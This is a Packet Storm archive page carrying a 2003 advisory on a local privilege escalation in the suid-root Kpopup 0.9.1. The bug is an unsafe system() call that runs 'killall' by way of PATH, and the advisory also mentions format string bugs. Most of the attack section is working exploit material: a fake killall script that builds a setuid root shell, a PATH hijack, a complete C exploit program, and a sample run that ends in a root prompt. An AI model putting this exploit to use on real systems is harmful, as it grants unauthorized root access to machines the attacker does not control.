what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

kpopup.txt

kpopup.txt
Posted Nov 4, 2003
Authored by b0f | Site b0f.net

Kpopup version 0.9.1 is susceptible to allowing privilege escalation due to format string bugs and an unsafe system() call. Local root exploit included.

tags | exploit, local, root
SHA-256 | c0f171d6124dd12b9f168e61bf36b1d35c6ab28f61c96e716bb04b751f4dc120

kpopup.txt

Change Mirror Download


A local root vuln exists in Kpopup version 0.9.1(latest) and
proberly all other versions. It is avaliable from
http://www.henschelsoft.de/kpopup_en.html (main site)
http://www.freebsd.org/ports/net.html
and many other places if you search kpopup on google.

I. BACKGROUND

Kpopup is a KDE program for sending and receiving MS Windows WinPopup
messages. When package is compiled and install the binary kpopup gets
installed suid root it also comes as part of FreeBSD ports collection.

II. DESCRIPTION & EXPLOIT
This app uses the system() call which is very unsafe expecially
on a suid root binary. It also contains Format string bugs in the
sprintf() function. In this advisory i will explain how to obtain
root privlages from this app by exploiting system(). There is 3
places on the misc.cpp source that use system(). The one we use to
exploit this is on line 106.

void sendSignalForNewMessage() {
char command[50];

sprintf(command, "killall -USR1 kpopup");
system(command);
}

To exploit this what we need to do is make a shell script and call it
killall and place it in the /tmp directory. Here is a script that i
wrote to exlpoit it.

#!/bin/sh
cd /tmp
/bin/cat > shell.c << EOF
#include <stdio.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF
/usr/bin/gcc /tmp/shell.c -o /tmp/shell
/bin/chown root.root shell
/bin/chmod 6711 shell
echo "NOW HERE IS YOUR ROOT SHELL"
/tmp/shell

so place this in /tmp as killall and chmod +x it. Now what we need to
do is.
export
PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:

Once this is done all we need to do is run the binary like so.
/usr/local/kde/bin/kpopup root shell
and thats it we now have root privs.

an example run of this...

[b0f@b0f b0f]$ export
PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:
[b0f@b0f b0f]$ /usr/local/kde/bin/kpopup root shell
fileerror!
NOW HERE IS YOUR ROOT SHELL
[root@b0f tmp]#

The format strings bugs are in that main.cpp source line 56 and 60
they can be triggered by
[b0f@b0f b0f]$ /usr/local/kde/bin/kpopup %n%n %n%n
Segmentation fault
[b0f@b0f b0f]$

I haven't exploited the fmt bugs. There also seems to be possable race
condtions
in kpopup.

III. EXPLOIT

/*Local root exploit for kpopup
*by b0f www.b0f.net
*/
#include <stdio.h>
int main()
{
setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\
/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
FILE *fd;
fd = fopen("/tmp/killall", "w");{
fprintf(fd, "#!/bin/sh\n");
fprintf(fd, "cd /tmp\n");
fprintf(fd, "/bin/cat > shell.c << EOF\n");
fprintf(fd, "#include <stdio.h>\n");
fprintf(fd, "int main()\n");
fprintf(fd, "{\n");
fprintf(fd, "setuid(0);\n");
fprintf(fd, "setgid(0);\n");
fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n");
fprintf(fd, "return 0;\n");
fprintf(fd, "}\n");
fprintf(fd, "EOF\n");
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n");
fprintf(fd, "/bin/chown root.root /tmp/shell\n");
fprintf(fd, "/bin/chmod 6711 /tmp/shell\n");
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n");
fprintf(fd, "/tmp/shell\n");
fclose(fd);
system("chmod +x /tmp/killall");
system("/usr/local/kde/bin/kpopup root shell");
return 0;
}
}


IV. ANALYSIS

An attacker could exploit this issue on a machine running kpopup to
obtain root privileges.

V.DETECTION

This is vulnerable in all versions off kpopup tested on Redhat 9.0

VI. VENDOR

The vendor has not been contacted about this issue.

Regards
b0f (Alan M)
www.b0f.net
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close